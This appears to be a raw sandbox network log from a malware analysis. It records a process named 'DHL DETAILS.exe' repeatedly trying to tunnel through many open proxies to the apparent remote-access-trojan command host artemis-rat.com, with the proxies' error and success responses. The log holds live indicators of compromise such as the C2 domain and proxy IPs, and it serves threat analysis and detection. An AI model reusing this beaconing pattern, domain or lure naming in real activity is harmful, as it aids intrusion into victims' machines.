Mar 9, 2024 13:14:18.848984003 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1412	192.168.2.5	54080	43.128.146.42	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.849133015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1413	192.168.2.5	54089	81.169.187.194	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.849190950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.167665005 CET	474	IN	HTTP/1.1 405 Method Not Allowed Date: Sat, 09 Mar 2024 12:14:19 GMT Server: Apache Allow: GET,POST,OPTIONS,HEAD Content-Length: 290 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p><hr><address>Apache Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1414	192.168.2.5	54210	172.67.181.144	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.859273911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.013581991 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1415	192.168.2.5	52831	69.61.200.104	36181	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.860683918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1416	192.168.2.5	53885	123.241.210.123	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.870759010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1417	192.168.2.5	54250	162.159.241.12	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.903237104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.064553022 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1418	192.168.2.5	54200	38.162.3.50	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.904503107 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.696713924 CET	111	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="" Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 Data Ascii: Proxy Authentication Required

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1419	192.168.2.5	54280	104.25.87.42	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.910828114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.065340042 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1420	192.168.2.5	54284	104.16.195.74	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.913824081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.068159103 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1421	192.168.2.5	54264	184.72.36.89	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.920121908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.091964960 CET	344	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:19 GMT Server: Apache Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1422	192.168.2.5	54301	188.114.99.171	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.921140909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.075274944 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1423	192.168.2.5	53638	61.19.145.66	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.927602053 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.707946062 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1424	192.168.2.5	54313	172.67.219.60	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.927894115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.083442926 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1425	192.168.2.5	54266	192.163.202.88	39782	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.928273916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.536442041 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.224488020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.333532095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1426	192.168.2.5	54138	47.243.114.192	8180	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.930864096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1427	192.168.2.5	54248	162.120.71.11	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.970096111 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.727078915 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1428	192.168.2.5	53550	115.245.86.37	3129	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.970299006 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1429	192.168.2.5	54365	192.154.246.96	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.973325014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1430	192.168.2.5	54115	82.137.244.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.973335028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1431	192.168.2.5	53515	41.65.227.105	1976	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.974620104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1432	192.168.2.5	54143	20.24.43.214	8123	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.974828005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.311894894 CET	319	IN	HTTP/1.1 403 Forbidden Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html;charset=utf-8 Content-Length: 17 X-Squid-Error: ERR_ACCESS_DENIED 0 X-Cache: MISS from cdn-fintech.info X-Cache-Lookup: NONE from cdn-fintech.info:8123 Connection: keep-alive Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1433	192.168.2.5	54213	45.43.81.44	5691	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.046538115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.447930098 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1434	192.168.2.5	52916	206.81.31.215	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.049905062 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1435	192.168.2.5	54352	148.72.23.56	36111	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.076648951 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.723896980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1436	192.168.2.5	52843	5.10.249.159	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.082338095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1437	192.168.2.5	54187	119.23.148.173	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.083252907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1438	192.168.2.5	54346	94.131.59.241	58378	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.091543913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1439	192.168.2.5	52821	195.35.20.90	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.091650009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
